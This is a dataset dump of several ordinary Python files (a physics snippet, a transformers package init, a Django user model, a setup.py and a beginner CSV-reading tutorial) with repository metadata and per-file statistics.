print 'v0 and mu must be pure numbers'
sys.exit(1)
d = 0.5 * v0 ** 2 / mu / g
print d
"""
Sample run:
python stopping_length.py 120 0.3
188.771850342
python stopping_length.py 50 0.3
32.7728906843
"""
| 22.827586 | 73 | 0.649547 | 111 | 662 | 3.837838 | 0.630631 | 0.028169 | 0.046948 | 0.070423 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129594 | 0.219033 | 662 | 28 | 74 | 23.642857 | 0.694391 | 0.194864 | 0 | 0 | 0 | 0 | 0.25908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.071429 | null | null | 0.214286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22f3a0221d0e140933a57d7b71e0a66cb6793a2d | 5,761 | py | Python | examples/DeepWisdom/Auto_NLP/deepWisdom/transformers_/__init__.py | zichuan-scott-xu/automl-workflow | d108e55da943775953b9f1801311a86ac07e58a0 | [
"Apache-2.0"
] | 3 | 2020-12-15T02:40:43.000Z | 2021-01-14T02:32:13.000Z | examples/DeepWisdom/Auto_NLP/deepWisdom/transformers_/__init__.py | zichuan-scott-xu/automl-workflow | d108e55da943775953b9f1801311a86ac07e58a0 | [
"Apache-2.0"
] | null | null | null | examples/DeepWisdom/Auto_NLP/deepWisdom/transformers_/__init__.py | zichuan-scott-xu/automl-workflow | d108e55da943775953b9f1801311a86ac07e58a0 | [
"Apache-2.0"
] | 4 | 2021-01-07T05:41:38.000Z | 2021-04-07T08:02:22.000Z | __version__ = "2.1.1"
# Work around to update TensorFlow's absl.logging threshold which alters the
# default Python logging output behavior when present.
# see: https://github.com/abseil/abseil-py/issues/99
# and: https://github.com/tensorflow/tensorflow/issues/26691#issuecomment-500369493
try:
import absl.logging
absl.logging.set_verbosity('info')
absl.logging.set_stderrthreshold('info')
absl.logging._warn_preinit_stderr = False
except:
pass
import logging
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
# Files and general utilities
from .file_utils import (TRANSFORMERS_CACHE, PYTORCH_TRANSFORMERS_CACHE, PYTORCH_PRETRAINED_BERT_CACHE,
cached_path, add_start_docstrings, add_end_docstrings,
WEIGHTS_NAME, TF2_WEIGHTS_NAME, TF_WEIGHTS_NAME, CONFIG_NAME,
is_tf_available, is_torch_available)
# Tokenizers
from .tokenization_utils import (PreTrainedTokenizer)
from .tokenization_auto import AutoTokenizer
from .tokenization_bert import BertTokenizer, BasicTokenizer, WordpieceTokenizer
from .tokenization_openai import OpenAIGPTTokenizer
from .tokenization_transfo_xl import (TransfoXLTokenizer, TransfoXLCorpus)
from .tokenization_gpt2 import GPT2Tokenizer
from .tokenization_ctrl import CTRLTokenizer
from .tokenization_xlnet import XLNetTokenizer, SPIECE_UNDERLINE
from .tokenization_xlm import XLMTokenizer
from .tokenization_roberta import RobertaTokenizer
from .tokenization_distilbert import DistilBertTokenizer
# Configurations
from .configuration_utils import PretrainedConfig
from .configuration_auto import AutoConfig
from .configuration_bert import BertConfig, BERT_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_openai import OpenAIGPTConfig, OPENAI_GPT_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_transfo_xl import TransfoXLConfig, TRANSFO_XL_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_gpt2 import GPT2Config, GPT2_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_ctrl import CTRLConfig, CTRL_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_xlnet import XLNetConfig, XLNET_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_ctrl import CTRLConfig, CTRL_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_xlm import XLMConfig, XLM_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_roberta import RobertaConfig, ROBERTA_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_distilbert import DistilBertConfig, DISTILBERT_PRETRAINED_CONFIG_ARCHIVE_MAP
# Modeling
if is_torch_available():
from .modeling_utils import (PreTrainedModel, prune_layer, Conv1D)
from .modeling_auto import (AutoModel, AutoModelForSequenceClassification, AutoModelForQuestionAnswering,
AutoModelWithLMHead)
from .modeling_bert import (BertPreTrainedModel, BertModel, BertForPreTraining,
BertForMaskedLM, BertForNextSentencePrediction,
BertForSequenceClassification, BertForMultipleChoice,
BertForTokenClassification, BertForQuestionAnswering,
load_tf_weights_in_bert, BERT_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_openai import (OpenAIGPTPreTrainedModel, OpenAIGPTModel,
OpenAIGPTLMHeadModel, OpenAIGPTDoubleHeadsModel,
load_tf_weights_in_openai_gpt, OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_transfo_xl import (TransfoXLPreTrainedModel, TransfoXLModel, TransfoXLLMHeadModel,
load_tf_weights_in_transfo_xl, TRANSFO_XL_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_gpt2 import (GPT2PreTrainedModel, GPT2Model,
GPT2LMHeadModel, GPT2DoubleHeadsModel,
load_tf_weights_in_gpt2, GPT2_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_ctrl import (CTRLPreTrainedModel, CTRLModel,
CTRLLMHeadModel,
CTRL_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_xlnet import (XLNetPreTrainedModel, XLNetModel, XLNetLMHeadModel,
XLNetForSequenceClassification, XLNetForMultipleChoice,
XLNetForQuestionAnsweringSimple, XLNetForQuestionAnswering,
load_tf_weights_in_xlnet, XLNET_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_xlm import (XLMPreTrainedModel , XLMModel,
XLMWithLMHeadModel, XLMForSequenceClassification,
XLMForQuestionAnswering, XLMForQuestionAnsweringSimple,
XLM_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_roberta import (RobertaForMaskedLM, RobertaModel,
RobertaForSequenceClassification, RobertaForMultipleChoice,
ROBERTA_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_distilbert import (DistilBertForMaskedLM, DistilBertModel,
DistilBertForSequenceClassification, DistilBertForQuestionAnswering,
DISTILBERT_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_albert import AlbertForSequenceClassification
# Optimization
from .optimization import (AdamW, ConstantLRSchedule, WarmupConstantSchedule, WarmupCosineSchedule,
WarmupCosineWithHardRestartsSchedule, WarmupLinearSchedule)
if not is_tf_available() and not is_torch_available():
logger.warning("Neither PyTorch nor TensorFlow >= 2.0 have been found."
"Models won't be available and only tokenizers, configuration"
"and file/data utilities can be used.")
| 59.391753 | 109 | 0.740844 | 519 | 5,761 | 7.870906 | 0.387283 | 0.046512 | 0.061689 | 0.063647 | 0.188005 | 0.188005 | 0.053856 | 0.053856 | 0.053856 | 0.053856 | 0 | 0.007764 | 0.217497 | 5,761 | 96 | 110 | 60.010417 | 0.898403 | 0.063183 | 0 | 0.025641 | 0 | 0 | 0.030269 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.012821 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
22f68910ff9dfaa421812c8e74e6090e44df810d | 1,797 | py | Python | project/users/models.py | rchdlps/django-docker | 2c12732264c1f17cd62e20927b5956db498c30b7 | [
"MIT"
] | null | null | null | project/users/models.py | rchdlps/django-docker | 2c12732264c1f17cd62e20927b5956db498c30b7 | [
"MIT"
] | null | null | null | project/users/models.py | rchdlps/django-docker | 2c12732264c1f17cd62e20927b5956db498c30b7 | [
"MIT"
] | null | null | null | from django.contrib.auth.models import AbstractUser
from django.db.models import CharField
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from django.db import models
from PIL import Image
class User(AbstractUser):
# First Name and Last Name do not cover name patterns
# around the globe.
name = CharField(_('Nome de usuário:'), blank=True, max_length=255)
# Profile Models
image = models.ImageField(verbose_name='Foto de Perfil:',
default='default.jpg', upload_to='profile_pics')
birth_date = models.DateField(_('Data de Nascimento:'), null=True, blank=True)
cpf = models.CharField(_('CPF:'), max_length=50, blank=True)
cnpj = models.CharField(_('CNPJ:'), max_length=50, blank=True)
bio = models.TextField(_('Descrição:'), blank=True, default='')
cep = models.CharField(_('CEP:'), max_length=50, blank=True)
street = models.CharField(_('Rua:'), max_length=100, blank=True)
number_home = models.CharField(_('Número:'), max_length=10, blank=True)
neighborhood = models.CharField(_('Bairro:'), max_length=100, blank=True)
city = models.CharField(_('Cidade:'), max_length=50, blank=True)
state = models.CharField(_('Estado:'), max_length=50, blank=True)
phone = models.CharField(_('Telefone:'), max_length=50, blank=True)
cel_phone = models.CharField(_('Celular:'), max_length=50, blank=True)
def get_absolute_url(self):
return reverse("users:detail", kwargs={"username": self.username})
"""def save(self):
super().save()
img = Image.open(self.image.path)
if img.height > 300 or img.width > 300:
output_size = (300, 300)
img.thumbnail(output_size)
img.save(self.image.path)"""
| 41.790698 | 82 | 0.673901 | 233 | 1,797 | 5.042918 | 0.437768 | 0.099574 | 0.065532 | 0.095319 | 0.154894 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025222 | 0.183639 | 1,797 | 42 | 83 | 42.785714 | 0.775733 | 0.046745 | 0 | 0 | 0 | 0 | 0.113091 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.25 | 0.041667 | 0.958333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
22feb380588bd77256d844c8ff999d4f5568fa43 | 1,499 | py | Python | setup.py | ovnicraft/runa | 4834b7467314c51c3e8e010b47a10bdfae597a5b | [
"MIT"
] | 5 | 2018-02-02T13:12:55.000Z | 2019-12-21T04:21:10.000Z | setup.py | ovnicraft/runa | 4834b7467314c51c3e8e010b47a10bdfae597a5b | [
"MIT"
] | 1 | 2017-12-18T15:49:13.000Z | 2017-12-18T15:49:13.000Z | setup.py | ovnicraft/runa | 4834b7467314c51c3e8e010b47a10bdfae597a5b | [
"MIT"
] | 1 | 2020-03-17T03:50:19.000Z | 2020-03-17T03:50:19.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import setup, find_packages
with open("README.rst") as readme_file:
readme = readme_file.read()
with open("HISTORY.rst") as history_file:
history = history_file.read()
requirements = ["Click>=6.0", "suds2==0.7.1"]
setup_requirements = [
# TODO(ovnicraft): put setup requirements (distutils extensions, etc.) here
]
test_requirements = [
# TODO: put package test requirements here
]
setup(
name="runa",
version="0.2.10",
description="Librería para uso de WS del Bus Gubernamental de Ecuador",
long_description=readme + "\n\n" + history,
author="Cristian Salamea",
author_email="cristian.salamea@gmail.com",
url="https://github.com/ovnicraft/runa",
packages=find_packages(include=["runa"]),
entry_points={"console_scripts": ["runa=runa.cli:main"]},
include_package_data=True,
install_requires=requirements,
license="MIT license",
zip_safe=False,
keywords="runa webservices ecuador bgs",
classifiers=[
"Development Status :: 3 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
],
test_suite="tests",
tests_require=test_requirements,
setup_requires=setup_requirements,
)
| 28.826923 | 79 | 0.662442 | 177 | 1,499 | 5.491525 | 0.581921 | 0.052469 | 0.07716 | 0.080247 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014913 | 0.194797 | 1,499 | 51 | 80 | 29.392157 | 0.790389 | 0.116745 | 0 | 0 | 0 | 0 | 0.384791 | 0.019772 | 0 | 0 | 0 | 0.019608 | 0 | 1 | 0 | false | 0 | 0.026316 | 0 | 0.026316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe02b43015e3d0762066c7be3eb1af3c04bff4d4 | 2,757 | py | Python | section_07_(files)/read_csv.py | govex/python-lessons | e692f48b6db008a45df0b941dee1e580f5a6c800 | [
"MIT"
] | 5 | 2019-10-25T20:47:22.000Z | 2021-12-07T06:37:22.000Z | section_07_(files)/read_csv.py | govex/python-lessons | e692f48b6db008a45df0b941dee1e580f5a6c800 | [
"MIT"
] | null | null | null | section_07_(files)/read_csv.py | govex/python-lessons | e692f48b6db008a45df0b941dee1e580f5a6c800 | [
"MIT"
] | 1 | 2021-07-20T18:56:15.000Z | 2021-07-20T18:56:15.000Z | # If you're new to file handling, be sure to check out with_open.py first!
# You'll also want to check out read_text.py before this example. This one is a bit more advanced.
with open('read_csv.csv', 'r') as states_file:
# Instead of leaving the file contents as a string, we're splitting the file into a list at every new line, and we save that list into the variable states
states = states_file.read().split("\n")
# Since this is a spreadsheet in comma separated values (CSV) format, we can think of states as a list of rows.
# But we'll need to split the columns into a list as well!
for index, state in enumerate(states):
states[index] = state.split(",")
# Now we have a nested list with all of the information!
# Our file looks like this:
# State, Population Estimate, Percent of Total population
# California, 38332521, 11.91%
# Texas, 26448193, 8.04%
# ...
# Our header row is at state[0], so we can use that to display the information in a prettier way.
for state in states[1:]: # We use [1:] so we skip the header row.
# state[0] is the first column in the row, which contains the name of the state.
print("\n---{0}---".format(state[0]))
for index, info in enumerate(state[1:]): # We use [1:] so we don't repeat the state name.
print("{0}:\t{1}".format(states[0][index+1], info))
# states is the full list of all of the states. It's a nested list. The outer list contains the rows, each inner list contains the columns in that row.
# states[0] refers to the header row of the list
# So states[0][0] would refer to "State", states[0][1] would refer to "Population Estimate", and states[0][2] would refer to "Percent of total population"
# state is one state within states. state is also a list, containing the name, population, and percentage of that particular state.
# So the first time through the loop, state[0] would refer to "California", state[1] would refer to 38332521, and state[2] would refer to 11.91%
# Since state is being create by the for loop in line 24, it gets a new value each time through.
# We're using enumerate to get the index (slicing number) of the column we're on, along with the information.
# That way we can pair the column name with the information, as shown in line 30.
# NOTE: Since we're slicing from [1:] in line 29, we need to increase the index by + 1, otherwise our headers will be off by one.
# Sample output:
# ---"California"---
# "Population Estimate": 38332521
# "Percent of Total population": "11.91%"
# ---"Texas"---
# "Population Estimate": 26448193
# "Percent of Total population": "8.04%"
# ---"New York"---
# "Population Estimate": 19651127
# "Percent of Total population": "6.19%"
| 48.368421 | 158 | 0.692057 | 470 | 2,757 | 4.048936 | 0.329787 | 0.031529 | 0.037835 | 0.063058 | 0.011561 | 0.011561 | 0 | 0 | 0 | 0 | 0 | 0.045205 | 0.205658 | 2,757 | 56 | 159 | 49.232143 | 0.823744 | 0.821545 | 0 | 0 | 0 | 0 | 0.078775 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.